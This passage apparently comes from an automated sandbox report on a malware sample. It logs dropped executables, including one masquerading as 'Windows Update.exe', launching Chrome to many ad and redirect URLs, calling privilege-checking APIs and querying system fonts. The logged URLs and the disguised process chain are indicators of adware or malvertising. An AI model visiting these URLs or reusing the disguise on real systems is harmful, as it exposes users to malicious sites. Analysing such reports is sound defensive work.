Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1339680	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1620783&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1343178	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3	Jump to behavior
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process created: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe "C:\Program Files (x86)\windows multimedia platform\Windows Update.exe"
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process created: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe "C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe"
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process created: C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe "C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe"

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Code function: 1_2_00478DC4 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,

1_2_00478DC4

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Code function: 1_2_0042E0AC AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,

1_2_0042E0AC

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Code function: 1_2_0042EE28 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,

1_2_0042EE28

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: GetLocaleInfoA,	0_2_0040520C
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: GetLocaleInfoA,	0_2_00405258
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: GetLocaleInfoA,	1_2_00408578
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: GetLocaleInfoA,	1_2_004085C4

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
